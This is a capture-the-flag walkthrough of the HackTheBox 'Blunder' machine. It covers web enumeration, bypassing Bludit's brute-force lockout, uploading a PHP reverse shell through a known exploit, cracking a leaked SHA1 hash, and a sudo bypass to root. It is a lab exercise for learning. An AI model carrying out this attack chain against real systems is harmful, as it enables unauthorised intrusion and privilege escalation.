Blunder – HackTheBox writeup

Blunder is a retired vulnerable Linux machine available from HackTheBox. The machine maker is egotisticalSW, thank you. It has an Easy difficulty with a rating of 4.1 out of 10.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. No automated tools are needed. The goal is to obtain root shell together with both user & root flags.

Exploitation Summary (tap to reveal)

Initial Exploitation

  • Vulnerability: Directory traversal with file upload
  • Explanation: Bludit CMS version 3.9.2 is vulnerable to directory traversal with PHP file upload. PHP file can then be executed to obtain a reverse shell.

Privilege Escalation – from www-data

  • Vulnerability: Credentials exposure in files
  • Explanation: User names and passwords hashes for Bludit CMS are stored in a file called users.php

Privilege Escalation – from hugo

  • Vulnerability: sudo bypass
  • Explanation: There is a sudo bypass exploit available for version < 2.8.28.


nmap -p- -A -T4
TCP 80: Apache httpd 2.4.41 (ubuntu)

Initial Exploitation

Only port 80 is open. That’s a website. Let’s check out the home page.

home page

Looks like it’s a CMS (Content Management System) hosting a few posts and an About page. There aren’t additional information from the other pages. When checking the source of the home page, it shows version of 3.9.2. But what CMS software is unknown yet.

view source

Let’s do a directory scan using gobuster to see if there’s any other interesting webpage or folders:

gobuster dir -u -w /usr/share/seclis
ts/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307" -x "txt,html,php"

gobuster finds couple interesting URLs: /admin and /todo.txt.


There is a user named fergus that maybe useful later. Let’s continue with /admin for now


Ok, it’s using a CMS software called Bludit. I check with Google to see if there’s any default credentials. It seems like admin is the default user but there is no default password. So I did some password guessing:

password guessing

Noop. No luck. And after about 10 trials, my IP address is blocked. Great.

Let’s do some more searches to see if there’s any exploits available:

google search

Find an exploit that can perform directory traversal and upload PHP payload. However, this exploit requires authentication. So I need to find some credentials to login first.

Further googling helps me land on another exploit that can bypass brute force protection. That is, I can bypass the IP address lock out:

brute force protection bypass

Sounds like a good path. If I can bypass lock out protection and brute force to find valid credentials, then the credentials can be used in the first exploit found to get an initial foothold.

I perform some more google search and find a python script that exploits the brute force protection.

bypass protection exploit

Downloaded and see how it works:

brute force

It’s pretty straight forward by providing the IP address, username and a wordlist. I used the script to perform dictionary attack using rockyou.txt on user admin & fergus. It took quite a while and didn’t find the password.

I then use cewl to screen-scrape the website to obtain a custom wordlist.

cewl -m 4 | sort -u > wordlist

Perform the dictionary attack again:

python3 fergus wordlist
password found

Excellent! Find credentials fergus:RolandDeschain.

Now let’s go back to the first exploit. Using searchsploit I am able to find the exploit script.

I make a copy of 48701.txt. It’s essentially a python script so simply rename it to Note, there’s a Metasploit exploit too but this guide will be using the python exploit.

48701 exploit

Looking at the python script, there is a few things to prepare before executing the script:

  • update the url, username & password in the script
  • the script suggests using msfvenom to create php reverse shell but I like to use the one that’s already available in kali. So modify the php reverse shell in kali with the correct kali IP address and use port 4000
  • prepare .htaccess file as described
  • start netcat to listen at port 4000

Now time to execute the exploit:

python3 execution

Looking good. Hopefully, the payloads are uploaded to the victim machine.

  • use browser to navigate to as described in the script.
initial shell

Awesome! initial shell obtained.

Privilege Escalation – from www-data

Quick browse under /home shows that user.txt is at /home/hugo/user.txt. That probably means we want to gain access as hugo.

Keep that in mind and let’s start enumeration of the system. After some browsing around, I find a file /var/www/bludit-3.9.2/bl-content/databases/users.php containing credentials for admin & fergus.

file with passwords

Unfortunately, those are not for hugo and password hashes are salted. These hashes may not be the best target to try cracking them for now. Let’s continue the enumeration because I remember the system has a folder of newer version of Bludit. Maybe it has something similar:

hugo password

Bingo! Credentials for hugo!

His password hash does not use salt. That’s even better. The hash contains 40 hex characters which translate to 160 bits. So most likely it’s a SHA1 hash.

I use to try decrypting the hash:
sha1 decrypted

Lucky we! Password decrypted and we have hugo’s credentials now:


Let’s try to login as hugo:

shell: hugo

Success! We login as hugo! Let’s grab the flag quickly.

user flag

Privilege Escalation – from hugo

Let’s do enumeration. One classic check is sudo -l


Nice, hugo can execute bash as any other users except root.

Googling about sudo exploit reviews a security bypass exploit that leads to privilege escalation:

sudo exploit

It works for sudo version < 1.8.28. Let’s find out sudo version:

sudo version

Perfect! Let’s get root using this sudo bypass exploit:

sudo bypass

There we go! root shell access. Let’s finish the final work: root flag

root flag

Leave a Reply

Close Menu